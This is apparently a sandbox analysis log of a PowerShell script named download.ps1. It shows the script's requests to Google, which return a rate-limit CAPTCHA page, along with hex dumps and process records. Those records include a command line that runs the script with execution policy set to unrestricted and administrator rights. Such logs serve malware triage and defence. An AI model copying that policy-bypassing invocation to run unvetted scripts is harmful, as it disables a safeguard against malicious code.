                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Connection: Keep-Alive
Dec 23, 2024 13:23:21.850532055 CET | 1289 | IN | HTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIuayluwYQ9vee_AISBL9g48w
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-w_bSVLdjQlJr2BeFBpJYiQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Set-Cookie: AEC=AZ6Zc-Wgfipmk0pPJMDo0N78S0B04DB7vFK6M3Im0v_hlrhomVf7mKvH4Tw; expires=Sat, 21-Jun-2025 12:23:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                  Set-Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w; expires=Tue, 24-Jun-2025 12:23:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/
                                                                  Dec 23, 2024 13:23:21.850773096 CET338INData Raw: 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20
                                                                  Data Ascii: html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92
                                                                  Dec 23, 2024 13:23:21.852533102 CET524OUTGET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
                                                                  Dec 23, 2024 13:23:21.954282045 CET1289INHTTP/1.1 429 Too Many Requests
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3075
                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                  Dec 23, 2024 13:23:21.954557896 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="kasZJgq5TnnyIsRJ-vTjQ9WmqJID-BnEiavbAx0ZohwjjAOS-aoWwOMxWREkeh2XafUrX9LkbOf6v4cc3a_H3AbqUNS3wmP3pE5GH3B4V4IIw63yuCLChMMTMJNIouyluR7Vwu4WC3yrVmhy0gVFK6W
                                                                  Dec 23, 2024 13:23:21.954567909 CET777INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s



Target ID: 0
Start time: 07:23:16
Start date: 23/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff640500000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 07:23:16
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7be100000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
